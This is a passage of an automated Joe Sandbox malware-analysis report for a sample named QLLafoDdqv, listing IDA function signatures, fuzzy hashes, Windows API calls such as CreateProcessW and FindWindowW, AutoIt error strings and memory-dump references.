              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Init_thread_footer_wcslen
              • String ID: ,%z$3yr
              • API String ID: 2551934079-955863410
              • Opcode ID: 2c4402e50c6b6e5617de2a358b820810c71575378733b799208fc222c24c016d
              • Instruction ID: a7edfe76951cb832cd2e0e8b42d4ed51f45b5ad6cc231fccb0dd3219fdbcb2c3
              • Opcode Fuzzy Hash: 2c4402e50c6b6e5617de2a358b820810c71575378733b799208fc222c24c016d
              • Instruction Fuzzy Hash: 0401F231B017549BD604F7A9E85BAAD3366AB46710F50046DF612572C3EE14AD028AAF
              APIs
              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007A3018,007A305C), ref: 007681BF
              • CloseHandle.KERNEL32 ref: 007681D1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CloseCreateHandleProcess
              • String ID: \0z
              • API String ID: 3712363035-4117864471
              • Opcode ID: a61c4887d1ae87d44d9d30118545c56bac6687de06d588077019c85d9200f800
              • Instruction ID: dcfd1650ff9f9dad5c39c1766fac693be47aafce6192e2c3c65a1f6bcf4a2800
              • Opcode Fuzzy Hash: a61c4887d1ae87d44d9d30118545c56bac6687de06d588077019c85d9200f800
              • Instruction Fuzzy Hash: 8FF05EF2640304BAF2206B61AC55FB77A5EEB46750F008425FB09D51A2D67E8A0086BD
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen
              • String ID: 3, 3, 16, 1
              • API String ID: 176396367-3042988571
              • Opcode ID: 668f778a576d829853c95fb52ae7cc8b47ad75ac4e95dc629c2aaf48cae7b939
              • Instruction ID: 385c44522ca8449eb092b8a0874ad614c195783e724050bf3574240c502b062e
              • Opcode Fuzzy Hash: 668f778a576d829853c95fb52ae7cc8b47ad75ac4e95dc629c2aaf48cae7b939
              • Instruction Fuzzy Hash: CDE02B423142A01092791279BCC19BF578ACFC6751714182FFE85C2266EED88D91D3E4
              APIs
              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00730B23
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Message
              • String ID: AutoIt$Error allocating memory.
              • API String ID: 2030045667-4017498283
              • Opcode ID: 131052c1a3818fc4de7a040c59b1d7c23eacf3dbce4ed8f085bb07cc2c64a18f
              • Instruction ID: db5bb6c375a93d2569122dcf9fc21b6f71fd352c79be6d3f560ff1877fbf2cc8
              • Opcode Fuzzy Hash: 131052c1a3818fc4de7a040c59b1d7c23eacf3dbce4ed8f085bb07cc2c64a18f
              • Instruction Fuzzy Hash: 3FE0DF722853583BE3513795BC03F997A858F05B20F10442EFB88A95C38AEA389046ED
              APIs
                • Part of subcall function 006EF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006F0D71,?,?,?,006D100A), ref: 006EF7CE
              • IsDebuggerPresent.KERNEL32(?,?,?,006D100A), ref: 006F0D75
              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,006D100A), ref: 006F0D84
              Strings
              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006F0D7F
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
              • API String ID: 55579361-631824599
              • Opcode ID: 08586736283a9378a41a567f06ac25862b2519157e89f1f7dd5278a938f7f14a
              • Instruction ID: c89ad6e1c1728380409cfe396672cbd7fd08949ee8f91528d2ba984c61e2b0c2
              • Opcode Fuzzy Hash: 08586736283a9378a41a567f06ac25862b2519157e89f1f7dd5278a938f7f14a
              • Instruction Fuzzy Hash: 25E06D742003518FE7619FB9E8143667BE5BF04744F00892DE982C6656DBB9E4448B91
              APIs
              • __Init_thread_footer.LIBCMT ref: 006EE3D5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Init_thread_footer
              • String ID: 0%z$8%z
              • API String ID: 1385522511-2349322819
              • Opcode ID: 4190390cf1a6c48f1de5394a7e45111aae993ceb4ca50ec6c9f91f4c40954f51
              • Instruction ID: 3744494fa0a67f3dfa4f14a2a431c119b8d081dbc42e476797605829c0a387a6
              • Opcode Fuzzy Hash: 4190390cf1a6c48f1de5394a7e45111aae993ceb4ca50ec6c9f91f4c40954f51
              • Instruction Fuzzy Hash: 69E02639C09B54CBCA0CD71DB874A983397BB86320B1042F9E102876D3DB3A28438A5C
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: LocalTime
              • String ID: %.3d$X64
              • API String ID: 481472006-1077770165
              • Opcode ID: 1823d0bf07577613be6fc554173f19c25d3abedaa6638b6d60d2e2043f11883e
              • Instruction ID: ee66dbbef33b84b311bd7062fc21563a31b46b20e366d64bca3fc53b704cf9fb
              • Opcode Fuzzy Hash: 1823d0bf07577613be6fc554173f19c25d3abedaa6638b6d60d2e2043f11883e
              • Instruction Fuzzy Hash: DDD012A1809268EACBA097E0EC498B9B3FCBB08301F608452F90692040D62CC908A761
              APIs
              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0076236C
              • PostMessageW.USER32(00000000), ref: 00762373
                • Part of subcall function 0073E97B: Sleep.KERNEL32 ref: 0073E9F3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FindMessagePostSleepWindow
              • String ID: Shell_TrayWnd
              • API String ID: 529655941-2988720461
              • Opcode ID: 5f749bf7df67a6de6ab2796c857d9412b6678a646be30653d4a4d9f1e0fb9096
              • Instruction ID: 9eaab2e10343fe383bf4a067f1f56af5326f29a07584b892d261a9c81393eb2f
              • Opcode Fuzzy Hash: 5f749bf7df67a6de6ab2796c857d9412b6678a646be30653d4a4d9f1e0fb9096
              • Instruction Fuzzy Hash: 6BD0C972381310BAEA65B770EC0FFD67A149B04B10F108A56B687AA1D1C9E8B8018A58
              APIs
              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0076232C
              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0076233F
                • Part of subcall function 0073E97B: Sleep.KERNEL32 ref: 0073E9F3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FindMessagePostSleepWindow
              • String ID: Shell_TrayWnd
              • API String ID: 529655941-2988720461
              • Opcode ID: bf7602e66a36ccdc5d640188f58874fe06d0f56ff74ab4b7f44bd8ae54560674
              • Instruction ID: ce25b423a7a44cd15642b3326b928e59ee0dfa6404ea332435358f6cfadc79ab
              • Opcode Fuzzy Hash: bf7602e66a36ccdc5d640188f58874fe06d0f56ff74ab4b7f44bd8ae54560674
              • Instruction Fuzzy Hash: EDD01276394310B7EA64B770EC0FFD67A149B04B10F108A56B787AA1D1C9F8B801CB58